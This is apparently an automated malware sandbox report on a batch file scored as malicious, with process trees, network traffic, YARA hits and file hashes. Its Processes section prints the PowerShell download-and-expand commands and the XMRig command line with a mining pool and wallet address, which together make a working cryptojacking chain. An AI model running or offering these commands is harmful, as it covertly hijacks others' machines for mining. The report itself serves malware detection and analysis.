Overview

Static: score 10

Behavioral tasks (score, sample, platform):
1   tesy - Copy (10).bat   windows10-1703-x64
10  tesy - Copy (11).bat   windows10-1703-x64
10  tesy - Copy (12).bat   windows10-1703-x64
10  tesy - Copy (13).bat   windows10-1703-x64
10  tesy - Copy (14).bat   windows10-1703-x64
10  tesy - Copy (2).bat    windows10-1703-x64
10  tesy - Copy (3).bat    windows10-1703-x64
10  tesy - Copy (4).bat    windows10-1703-x64
10  tesy - Copy (5).bat    windows10-1703-x64
10  tesy - Copy (6).bat    windows10-1703-x64
10  tesy - Copy (7).bat    windows10-1703-x64
10  tesy - Copy (8).bat    windows10-1703-x64
10  tesy - Copy (9).bat    windows10-1703-x64
10  tesy - Copy.bat        windows10-1703-x64
10  tesy.bat               windows10-1703-x64
Analysis: score 10

max time kernel: 1794s
max time network: 1806s
platform: windows10-1703_x64
resource: win10-20231215-en
resource tags: arch:x64, arch:x86, image:win10-20231215-en, locale:en-us, os:windows10-1703-x64, system
submitted: 30/12/2023, 07:23 UTC
Static task: static1

Behavioral tasks (task, sample, resource):
behavioral1   tesy - Copy (10).bat   win10-20231220-en
behavioral2   tesy - Copy (11).bat   win10-20231215-en
behavioral3   tesy - Copy (12).bat   win10-20231220-en
behavioral4   tesy - Copy (13).bat   win10-20231215-en
behavioral5   tesy - Copy (14).bat   win10-20231215-en
behavioral6   tesy - Copy (2).bat    win10-20231215-en
behavioral7   tesy - Copy (3).bat    win10-20231215-en
behavioral8   tesy - Copy (4).bat    win10-20231215-en
behavioral9   tesy - Copy (5).bat    win10-20231215-en
behavioral10  tesy - Copy (6).bat    win10-20231215-en
behavioral11  tesy - Copy (7).bat    win10-20231215-en
behavioral12  tesy - Copy (8).bat    win10-20231215-en
behavioral13  tesy - Copy (9).bat    win10-20231215-en
behavioral14  tesy - Copy.bat        win10-20231215-en
General

Target: tesy - Copy.bat
Size: 608B
MD5: 727c8da0478af118c957ae60f7161cab
SHA1: cf18105b8659e93bbd2824fa35ef1bae7b395301
SHA256: 97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
SHA512: d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

Malware Config

Extracted URL: https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
Signatures

XMRig Miner payload (64 IoCs)
resource                                                                                     yara_rule
behavioral14/files/0x000600000001ac25-119.dat                                                family_xmrig
behavioral14/files/0x000600000001ac25-119.dat                                                xmrig
behavioral14/memory/5088-N-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp                  xmrig
  (62 dumps of the same region: N = 122, 123, 126, 127 and every value from 130 to 187)

Blocklisted process makes network request (2 IoCs)
flow  pid   Process
4     5044  powershell.exe
6     5044  powershell.exe

Executes dropped EXE (1 IoC)
pid   Process
5088  xmrig.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
pid   Process
5044  powershell.exe
5044  powershell.exe
5044  powershell.exe
1844  powershell.exe
1844  powershell.exe
1844  powershell.exe

Suspicious behavior: LoadsDriver (1 IoC)
pid   Process
640   Process not Found

Suspicious use of AdjustPrivilegeToken (4 IoCs)
description                    pid   Process
Token: SeDebugPrivilege        5044  powershell.exe
Token: SeDebugPrivilege        1844  powershell.exe
Token: SeLockMemoryPrivilege   5088  xmrig.exe
Token: SeLockMemoryPrivilege   5088  xmrig.exe

Suspicious use of FindShellTrayWindow (1 IoC)
pid   Process
5088  xmrig.exe

Suspicious use of WriteProcessMemory (6 IoCs)
description                     pid  Process  procid_target
PID 8 wrote to memory of 5044   8    cmd.exe  30
PID 8 wrote to memory of 5044   8    cmd.exe  30
PID 8 wrote to memory of 1844   8    cmd.exe  74
PID 8 wrote to memory of 1844   8    cmd.exe  74
PID 8 wrote to memory of 5088   8    cmd.exe  75
PID 8 wrote to memory of 5088   8    cmd.exe  75
Processes

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy.bat"
  PID: 8
  Signatures: Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
    PID: 5044
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"
    PID: 1844
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
    Command line: xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
    PID: 5088
    Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
Network

DNS (remote address 8.8.8.8:53): request github.com IN A; response github.com IN A 140.82.121.4

GET https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip (powershell.exe, remote address 140.82.121.4:443)
Request:
GET /xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip HTTP/1.1
Host: github.com
Connection: Keep-Alive
Response:
HTTP/1.1 302 Found
Date: Sat, 30 Dec 2023 07:24:57 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com support.github.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com 
*.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C286:208389:E61212D:E98B35F:658FC5CB

DNS (remote address 8.8.8.8:53): request objects.githubusercontent.com IN A; response objects.githubusercontent.com IN A 185.199.108.133, 185.199.109.133, 185.199.110.133, 185.199.111.133

GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream (powershell.exe, remote address 185.199.108.133:443)
Request:
GET /github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1
Host: objects.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 3334626
Content-Type: application/octet-stream
Content-MD5: SyJ16N9lcZAJMUoKI6RVWA==
Last-Modified: Thu, 23 Nov 2023 14:15:49 GMT
ETag: "0x8DBEC2EB1771407"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 72337178-c01e-0025-4b17-1e4829000000
x-ms-version: 2020-04-08
x-ms-creation-time: Thu, 23 Nov 2023 14:15:49 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=xmrig-6.21.0-gcc-win64.zip
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Sat, 30 Dec 2023 07:24:59 GMT
Age: 3326
X-Served-By: cache-iad-kiad7000110-IAD, cache-lcy-eglc8600035-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 10174, 1
X-Timer: S1703921099.496240,VS0,VE323

DNS lookups (remote address 8.8.8.8:53):
request 4.121.82.140.in-addr.arpa IN PTR; response 4.121.82.140.in-addr.arpa IN PTR lb-140-82-121-4-fra.github.com
request 133.108.199.185.in-addr.arpa IN PTR; response 133.108.199.185.in-addr.arpa IN PTR cdn-185-199-108-133.github.com
request 79.121.231.20.in-addr.arpa IN PTR; response: (empty)
request pool.hashvault.pro IN A; response pool.hashvault.pro IN A 95.179.241.203, 45.76.89.70
request 203.241.179.95.in-addr.arpa IN PTR; response 203.241.179.95.in-addr.arpa IN PTR 95.179.241.203.vultrusercontent.com
request 114.110.16.96.in-addr.arpa IN PTR; response 114.110.16.96.in-addr.arpa IN PTR a96-16-110-114.deploy.static.akamaitechnologies.com
request 114.110.16.96.in-addr.arpa IN PTR (no response recorded)
request 19.229.111.52.in-addr.arpa IN PTR; response: (empty)
request 19.229.111.52.in-addr.arpa IN PTR (no response recorded)
request 19.229.111.52.in-addr.arpa IN PTR (no response recorded)
request 89.16.208.104.in-addr.arpa IN PTR; response: (empty)
request 194.178.17.96.in-addr.arpa IN PTR; response 194.178.17.96.in-addr.arpa IN PTR a96-17-178-194.deploy.static.akamaitechnologies.com
request 180.178.17.96.in-addr.arpa IN PTR; response 180.178.17.96.in-addr.arpa IN PTR a96-17-178-180.deploy.static.akamaitechnologies.com
request 180.178.17.96.in-addr.arpa IN PTR (no response recorded)
request 180.178.17.96.in-addr.arpa IN PTR (no response recorded)
Traffic summary:

140.82.121.4:443  https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip  tls, http  powershell.exe  814 B  6.6kB  9  7
  HTTP Request: GET https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
  HTTP Response: 302

185.199.108.133:443  https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream  tls, http  powershell.exe  69.1kB  3.3MB  1424  2372
  HTTP Request: GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream
  HTTP Response: 200

29.8kB  67.8kB  231  186

56 B  72 B  1  1
  DNS Request: github.com
  DNS Response: 140.82.121.4

75 B  139 B  1  1
  DNS Request: objects.githubusercontent.com
  DNS Response: 185.199.108.133, 185.199.109.133, 185.199.110.133, 185.199.111.133

71 B  115 B  1  1
  DNS Request: 4.121.82.140.in-addr.arpa

74 B  118 B  1  1
  DNS Request: 133.108.199.185.in-addr.arpa

72 B  158 B  1  1
  DNS Request: 79.121.231.20.in-addr.arpa

64 B  96 B  1  1
  DNS Request: pool.hashvault.pro
  DNS Response: 95.179.241.203, 45.76.89.70

73 B  122 B  1  1
  DNS Request: 203.241.179.95.in-addr.arpa

144 B  137 B  2  1
  DNS Request: 114.110.16.96.in-addr.arpa
  DNS Request: 114.110.16.96.in-addr.arpa

216 B  158 B  3  1
  DNS Request: 19.229.111.52.in-addr.arpa
  DNS Request: 19.229.111.52.in-addr.arpa
  DNS Request: 19.229.111.52.in-addr.arpa

72 B  146 B  1  1
  DNS Request: 89.16.208.104.in-addr.arpa

72 B  137 B  1  1
  DNS Request: 194.178.17.96.in-addr.arpa

216 B  137 B  3  1
  DNS Request: 180.178.17.96.in-addr.arpa
  DNS Request: 180.178.17.96.in-addr.arpa
  DNS Request: 180.178.17.96.in-addr.arpa
MITRE ATT&CK Matrix
Downloads

Filesize: 3KB
MD5: 56efdb5a0f10b5eece165de4f8c9d799
SHA1: fa5de7ca343b018c3bfeab692545eb544c244e16
SHA256: 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA512: 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Filesize: 1KB
MD5: ef32294976d9291d732045f2c7b75bd9
SHA1: 8d3a27350a4e625f8456b5f1a02e73904165557e
SHA256: 759e256b19951b0035e2baa428715ff699e7ae35f7671b929ac02b24ca553219
SHA512: fa31da6c840290f04634f2e558885a913c78672a4eebc5f8fb08c7269f79f1af586557ee68ede23f37a31a34e507ec7b4307d6cf53fadc7e80d95865063e1e03

Filesize: 1B
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Filesize: 30KB
MD5: e0fd4e23e9c6101b3e26c14a9579b389
SHA1: cb0da5f01413e3f6ec3ddb707a2cba3ff5a03e4e
SHA256: a6e6773a1dcb9788d9838c2be3fda5fbd422d7931b73c2997598b61dc013aeac
SHA512: bc8b1af3472ad5f99b440f61853300ca501341cfef5e6d6c0156331ae0c3be0e788d7663569c1edbd94e083e77c9cf3ca35d28ff339b00805ac6bc373cc618cf

Filesize: 78KB
MD5: 05687030d6c1ff777ef5f200c6cb3e9d
SHA1: 3ab330585182bb084509873bb8594e7aae48124a
SHA256: b404c3f533cf252f51749190bcf028ee93536a7edb49565debe478fd223907e9
SHA512: 27b8760dc3b2f109e92f8a675dfd28f5cd0d7463fea741e874040ccb30d588a5cbb46b075a6301187e3f714d714a01b3b637206b94bccc9874c15439c9828325